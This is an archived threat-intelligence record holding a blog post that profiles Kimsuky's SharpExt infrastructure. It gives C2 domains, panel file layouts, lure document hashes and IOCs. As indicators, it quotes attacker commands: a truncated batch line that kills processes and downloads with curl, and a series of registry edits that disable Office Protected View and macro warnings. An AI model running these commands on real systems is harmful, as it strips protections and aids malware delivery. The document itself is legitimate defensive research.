{ "id": "cd73f1dd-043e-4ac3-8141-d86bcab20ad9", "created_at": "2026-04-06T02:11:16.501574Z", "updated_at": "2026-04-10T03:37:40.730388Z", "deleted_at": null, "sha1_hash": "1138d174099e24eea4d84a44a1586e953c1a3cdd", "title": "Pivoting on a SharpExt to profile Kimsuky panels for great good", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 542015, "plain_text": "Pivoting on a SharpExt to profile Kimsuky panels for great good\r\nBy Jason Reaves\r\nPublished: 2023-02-20 · Archived: 2026-04-06 01:30:57 UTC\r\n5 min read\r\nAug 9, 2022\r\nBy: Jason Reaves and Joshua Platt\r\nPress enter or click to view image in full size\r\nVolexity recently released a blog detailing a browser extension malware dubbed SharpExt[1] being leveraged by\r\nKimsuky[2]. The goal of SharpExt, as detailed in the blog, is to ultimately steal emails and attachments from the\r\nvictims. This blog is purely meant to expand on existing work from items we recovered through our pivoting and\r\nresearch.\r\nPivoting on their research along with some research from Huntress[3], we also found a connection to earlier\r\ncampaigns in a report from 2021[4]. One site in particular was interesting.\r\nhttp://nuclearpolicy101[.]org/wp-admin/includes/0421/d[.]php?na=vbtmp 14\r\nhttps://medium.com/walmartglobaltech/pivoting-on-a-sharpext-to-profile-kimusky-panels-for-great-good-1920dc1bcef9\r\nPage 1 of 7\n\nThe site has been utilized by Kimsuky for over a year and earlier this year was updated to deliver the browser\r\nextension code:\r\nPress enter or click to view image in full size\r\nThe bg.js file from nuclearpolicy101 also listed the same C2 as the Volexity blog:\r\nvar g_url = \"https://gonamod.com/sanghyon/index.php\",g_devtabs=[]; 20\r\nA second IOC listed from Volexity, siekis[.]com, is a little more interesting. This site is not a compromised site but\r\nsomething actor controlled. The site is hosting multiple websites along with connections to some of the campaigns\r\ndetailed from Huntress. However, the VPS folders have been renamed. Current domains setup on this server:\r\ndusieme.com/\r\neislesf.live/\r\nielsems.com/\r\nilijw.live/\r\nsiekis.com/\r\nsoekfes.live/\r\nsqiesbob.com/\r\nSome of the domains that are leveraged for the campaigns, can be seen in the aforementioned blogs[1,3]. The\r\nstructure of these are normally a mix of the following files:\r\ncow.php\r\nd.php\r\nr.php\r\nsc.php\r\nhis.php\r\nindex.php\r\nupload.php\r\nupload_dotm.php\r\ndoc.php\r\nmacro.php\r\nhttps://medium.com/walmartglobaltech/pivoting-on-a-sharpext-to-profile-kimusky-panels-for-great-good-1920dc1bcef9\r\nPage 2 of 7\n\nresp.txt\r\nres/\r\nThe other files in the folder are related to the various powershell, batch files, DLLs and browser extensions that\r\nare delivered.\r\nGet Jason Reaves’s stories in your inbox\r\nJoin Medium for free to get updates from this writer.\r\nRemember me for faster sign in\r\nSome of the other domains are leveraged for C2 activity from the browser extension along with any necessary\r\nfiles needed by the browser extension. These folders usually consist of the following:\r\nindex.php\r\nmanage.php\r\ncode.js\r\nlist.txt\r\nblack_list.txt\r\natt/\r\ndomain/\r\nmail/\r\nThrough our research, we were able to map out some victimology based on traffic data:\r\nPress enter or click to view image in full size\r\nThe hot spots mostly just seem to confirm other reporting on intended targets as United States, Europe and South\r\nKorea[1].\r\nhttps://medium.com/walmartglobaltech/pivoting-on-a-sharpext-to-profile-kimusky-panels-for-great-good-1920dc1bcef9\r\nPage 3 of 7\n\nOlder Campaigns\r\nDuring our research, we also recovered information from older campaigns that did not utilize a browser extension.\r\nSurprisingly, the actor(s) appeared to leverage UltraViewer in some engagements:\r\nPress enter or click to view image in full size\r\nJudging by documents we recovered, the group continues to be very active:\r\nESDU Tokuchi.doc\r\nad869e6765212fb1c724936a4e9b6a35\r\nCreated: 2022-04-29Interview memo_Gareth.doc\r\ne6f6dedc573c7be462e74ff1289aab34\r\nCreated: 2022-05-08Donga-A_VAN.doc\r\na7b6491683766b01b7b9c76652a3993f\r\nCreated: 2022-03-07TBS TV_Qs.doc\r\n77258de4bfa37fe26d5b4d6348fd31a6\r\nCreated: 2022-04-09NEWSIS_interview.doc\r\nb3103f9543b31d00d9fecf3943cb6b6d\r\nCreated: 2022-01-26China.doc\r\n46bc9c7ed36f6f8d2c3f968cb758df1f\r\nCreated: 2022-03-28Interview memo_Ralph.doc\r\n9c2434cbfa7e6ff49c67bfc74a6bf7bc\r\nCreated: 2022-04-24US-ROK Tech Cooperation Goodman.doc\r\ndf7cd79c5e9cc5471f1772f75b646467\r\nCreated: 2022-04-25CM College_interview.doc\r\n36e6f04777e1bbdc719a3adc7d842586\r\nCreated: 2022-04-27Interview memo_patrick.doc\r\n42805ec97173c4a074580d473aeecbe4\r\nCreated: 2022-04-21Upholding the RBO in the INdo-Pac.doc\r\nb57e9474698823fcb300ad29b2ddd657\r\nCreated: 2022-04-10\r\nSimilar to past campaigns, they continue to use HWP (Hangul Word Processor) documents:\r\nThe Burden of the Unintended.hwp\r\nCreated 2022-02-24\r\nUpon execution, the HWP documents execute a batch file similar to the one below:\r\nhttps://medium.com/walmartglobaltech/pivoting-on-a-sharpext-to-profile-kimusky-panels-for-great-good-1920dc1bcef9\r\nPage 4 of 7\n\nkill /im OneDriveStandaloneUpdater.exe /f 2taskkill /im OneDriveStandaloneUpdater.exe /f 3curl -o \"%a\r\nIOCs\r\nNetwork:\r\nsouibi.com\r\ndusieme.com\r\neislesf.live\r\nielsems.com\r\nilijw.live\r\nsiekis.com\r\nsoekfes.live\r\nsqiesbob.com\r\ngonamod.com\r\nbeastmodser.club\r\nnuclearpolicy101.org (compromised)\r\nfrebough.com\r\nhodbeast.com\r\nnewspeers.com\r\nnewspeers.us\r\nvisitnewsworld.xyz\r\ndocsaccess.xyz\r\nresepmo.com\r\nretmodul.com\r\nworldinfocontact.club\r\nwrldinfocontact.club\r\nsecmets.live\r\npreheds.shop\r\nCommands:\r\nreg add HKEY_CURRENT_USER\\Software\\RegisteredApplications /v AppXr1bysyqf6kpaq1aje5sbadka8dgx3g4g /t\r\n reg add \"HKCU\\Software\\Microsoft\\Office\\13.0\\Word\\Security\\ProtectedView\" /v DisableInternetFilesInP\r\n reg add \"HKCU\\Software\\Microsoft\\Office\\16.0\\Word\\Security\\ProtectedView\" /v DisableInternetFilesInP\r\n reg add \"HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\14.0\\Word\\Security\" /v VBAWarnings /t REG_DWORD\r\n reg add \"HKCU\\Software\\Microsoft\\Office\\13.0\\Word\\Security\\ProtectedView\" /v DisableAttachementsInPV\r\n reg add \"HKCU\\Software\\Microsoft\\Office\\12.0\\Word\\Security\\ProtectedView\" /v DisableInternetFilesInP\r\n reg add \"HKCU\\Software\\Microsoft\\Office\\12.0\\Word\\Security\\ProtectedView\" /v DisableUnsafeLocationsI\r\n reg add \"HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Word\\Security\" /v VBAWarnings /t REG_DWORD\r\nhttps://medium.com/walmartglobaltech/pivoting-on-a-sharpext-to-profile-kimusky-panels-for-great-good-1920dc1bcef9\r\nPage 5 of 7\n\nreg add \"HKCU\\Software\\Microsoft\\Office\\15.0\\Word\\Security\\ProtectedView\" /v DisableInternetFilesInP\r\n reg add \"HKCU\\Software\\Microsoft\\Office\\12.0\\Word\\Security\\ProtectedView\" /v DisableAttachementsInPV\r\n reg add \"HKCU\\Software\\Microsoft\\Office\\14.0\\Word\\Security\\ProtectedView\" /v DisableInternetFilesInP\r\n reg add \"HKCU\\Software\\Microsoft\\Office\\16.0\\Word\\Security\\ProtectedView\" /v DisableAttachementsInPV\r\n reg add \"HKCU\\Software\\Microsoft\\Office\\16.0\\Word\\Security\\ProtectedView\" /v DisableUnsafeLocationsI\r\n reg add \"HKCU\\Software\\Microsoft\\Office\\13.0\\Word\\Security\\ProtectedView\" /v DisableUnsafeLocationsI\r\n reg add \"HKCU\\Software\\Microsoft\\Office\\14.0\\Word\\Security\\ProtectedView\" /v DisableAttachementsInPV\r\n reg add \"HKCU\\Software\\Microsoft\\Office\\14.0\\Word\\Security\\ProtectedView\" /v DisableUnsafeLocationsI\r\n reg add \"HKCU\\Software\\Microsoft\\Office\\15.0\\Word\\Security\\ProtectedView\" /v DisableAttachementsInPV\r\n reg add \"HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\12.0\\Word\\Security\" /v VBAWarnings /t REG_DWORD\r\n reg add \"HKCU\\Software\\Microsoft\\Office\\15.0\\Word\\Security\\ProtectedView\" /v DisableUnsafeLocationsI\r\n reg add \"HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Word\\Security\" /v VBAWarnings /t REG_DWORD\r\nreg add \"HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\14.0\\Excel\\Security\" /v VBAWarnings /t REG_DWORD\r\nRecovered Documents:\r\n42805ec97173c4a074580d473aeecbe4\r\nb57e9474698823fcb300ad29b2ddd657\r\ned424b7dbe6ce5dfdd051fca7d216ea4\r\n43d95c74d3ed1e4ee8f07c286a95258b\r\n36e6f04777e1bbdc719a3adc7d842586\r\nbd69b7fe688f121f33f2cb752d3d9aee\r\nd902d7688d75dddca219a3eac5bbab10\r\n31bafa8e3dfee43e305fd1bb1174ebea\r\nbba46893cb8b8130aeca98955751d8df\r\nf8ddac12d26c0cda72f6b37d405525fc\r\na7a6a36e6dbe3816209786f4e04a2936\r\n7306d5afdd54164650a17c66f354dea4\r\n1907f12e443edbae04d85a7981f50e46\r\n7c387100acfd1129ef59753f469950de\r\n98955bcdce0d45d2dcd328c4c762b598\r\n8db970e3670c8dcdea1ac346df6a5409\r\nc23157dc5f321a461b7c6e84a83ed462\r\nf4e98ff7a041291311f4a2d548fb1204\r\nda9b66ad97b93e5b11cbd9b4e6f255b9\r\ne023261bf272a96a13a1765fc579257f\r\nb3103f9543b31d00d9fecf3943cb6b6d\r\nee1b273c729a946d494826fa0104a51f\r\nf4e98ff7a041291311f4a2d548fb1204\r\nhttps://medium.com/walmartglobaltech/pivoting-on-a-sharpext-to-profile-kimusky-panels-for-great-good-1920dc1bcef9\r\nPage 6 of 7\n\n7cb6eca45f351670e48e3b54f252ac4d\r\n1de67d829884ea1f4b51c94104b47374\r\nd902d7688d75dddca219a3eac5bbab10\r\n80e5fc84e30c208fb4d0e71046c26b11\r\n77258de4bfa37fe26d5b4d6348fd31a6\r\na7b6491683766b01b7b9c76652a3993f\r\naa8b64f8b22126b1199d345ee5088003\r\n46bc9c7ed36f6f8d2c3f968cb758df1f\r\nd902d7688d75dddca219a3eac5bbab10\r\n2def674177ad929ffe91545fee474132\r\ne6f6dedc573c7be462e74ff1289aab34\r\ne1e6dc332827b958e93b3548f647d70c\r\nad869e6765212fb1c724936a4e9b6a35\r\n3e8846e6e4eb963077aa3e0f5134b072\r\n9c2434cbfa7e6ff49c67bfc74a6bf7bc\r\ndf7cd79c5e9cc5471f1772f75b646467\r\nedf19a5f034d6251d652b3ad353c4fe9\r\n3c9c5e555e6b4b8cfa9046a08f3cf92b\r\nReferences\r\n1: https://www.volexity.com/blog/2022/07/28/sharptongue-deploys-clever-mail-stealing-browser-extension-sharpext/\r\n2: https://malpedia.caad.fkie.fraunhofer.de/actor/kimsuky\r\n3: https://www.huntress.com/blog/targeted-apt-activity-babyshark-is-out-for-blood\r\n4: http://www.hackdig.com/07/hack-420942.htm\r\nSource: https://medium.com/walmartglobaltech/pivoting-on-a-sharpext-to-profile-kimusky-panels-for-great-good-1920dc1bcef9\r\nhttps://medium.com/walmartglobaltech/pivoting-on-a-sharpext-to-profile-kimusky-panels-for-great-good-1920dc1bcef9\r\nPage 7 of 7", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://medium.com/walmartglobaltech/pivoting-on-a-sharpext-to-profile-kimusky-panels-for-great-good-1920dc1bcef9" ], "report_names": [ "pivoting-on-a-sharpext-to-profile-kimusky-panels-for-great-good-1920dc1bcef9" ], "threat_actors": [ { "id": "191d7f9a-8c3c-442a-9f13-debe259d4cc2", "created_at": "2022-10-25T15:50:23.280374Z", "updated_at": "2026-04-10T02:00:05.305572Z", "deleted_at": null, "main_name": "Kimsuky", "aliases": [ "Kimsuky", "Black Banshee", "Velvet Chollima", "Emerald Sleet", "THALLIUM", "APT43", "TA427", "Springtail" ], "source_name": "MITRE:Kimsuky", "tools": [ "Troll Stealer", "schtasks", "Amadey", "GoBear", "Brave Prince", "CSPY Downloader", "gh0st RAT", "AppleSeed", "Gomir", "NOKKI", "QuasarRAT", "Gold Dragon", "PsExec", "KGH_SPY", "Mimikatz", "BabyShark", "TRANSLATEXT" ], "source_id": "MITRE", "reports": null }, { "id": "760f2827-1718-4eed-8234-4027c1346145", "created_at": "2023-01-06T13:46:38.670947Z", "updated_at": "2026-04-10T02:00:03.062424Z", "deleted_at": null, "main_name": "Kimsuky", "aliases": [ "G0086", "Emerald Sleet", "THALLIUM", "Springtail", "Sparkling Pisces", "Thallium", "Operation Stolen Pencil", "APT43", "Velvet Chollima", "Black Banshee" ], "source_name": "MISPGALAXY:Kimsuky", "tools": [ "xrat", "QUASARRAT", "RDP Wrapper", "TightVNC", "BabyShark", "RevClient" ], "source_id": "MISPGALAXY", "reports": null }, { "id": "c8bf82a7-6887-4d46-ad70-4498b67d4c1d", "created_at": "2025-08-07T02:03:25.101147Z", "updated_at": "2026-04-10T02:00:03.846812Z", "deleted_at": null, "main_name": "NICKEL KIMBALL", "aliases": [ "APT43 ", "ARCHIPELAGO ", "Black Banshee ", "Crooked Pisces ", "Emerald Sleet ", "ITG16 ", "Kimsuky ", "Larva-24005 ", "Opal Sleet ", "Ruby Sleet ", "SharpTongue ", "Sparking Pisces ", "Springtail ", "TA406 ", "TA427 ", "THALLIUM ", "UAT-5394 ", "Velvet Chollima " ], "source_name": "Secureworks:NICKEL KIMBALL", "tools": [ "BabyShark", "FastFire", "FastSpy", "FireViewer", "Konni" ], "source_id": "Secureworks", "reports": null }, { "id": "71a1e16c-3ba6-4193-be62-be53527817bc", "created_at": "2022-10-25T16:07:23.753455Z", "updated_at": "2026-04-10T02:00:04.73769Z", "deleted_at": null, "main_name": "Kimsuky", "aliases": [ "APT 43", "Black Banshee", "Emerald Sleet", "G0086", "G0094", "ITG16", "KTA082", "Kimsuky", "Larva-24005", "Larva-25004", "Operation Baby Coin", "Operation Covert Stalker", "Operation DEEP#DRIVE", "Operation DEEP#GOSU", "Operation Kabar Cobra", "Operation Mystery Baby", "Operation Red Salt", "Operation Smoke Screen", "Operation Stealth Power", "Operation Stolen Pencil", "SharpTongue", "Sparkling Pisces", "Springtail", "TA406", "TA427", "Thallium", "UAT-5394", "Velvet Chollima" ], "source_name": "ETDA:Kimsuky", "tools": [ "AngryRebel", "AppleSeed", "BITTERSWEET", "BabyShark", "BoBoStealer", "CSPY Downloader", "Farfli", "FlowerPower", "Gh0st RAT", "Ghost RAT", "Gold Dragon", "GoldDragon", "GoldStamp", "JamBog", "KGH Spyware Suite", "KGH_SPY", "KPortScan", "KimJongRAT", "Kimsuky", "LATEOP", "LOLBAS", "LOLBins", "Living off the Land", "Lovexxx", "MailPassView", "Mechanical", "Mimikatz", "MoonPeak", "Moudour", "MyDogs", "Mydoor", "Network Password Recovery", "PCRat", "ProcDump", "PsExec", "ReconShark", "Remote Desktop PassView", "SHARPEXT", "SWEETDROP", "SmallTiger", "SniffPass", "TODDLERSHARK", "TRANSLATEXT", "Troll Stealer", "TrollAgent", "VENOMBITE", "WebBrowserPassView", "xRAT" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775441476, "ts_updated_at": 1775792260, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/1138d174099e24eea4d84a44a1586e953c1a3cdd.pdf", "text": "https://archive.orkl.eu/1138d174099e24eea4d84a44a1586e953c1a3cdd.txt", "img": "https://archive.orkl.eu/1138d174099e24eea4d84a44a1586e953c1a3cdd.jpg" } }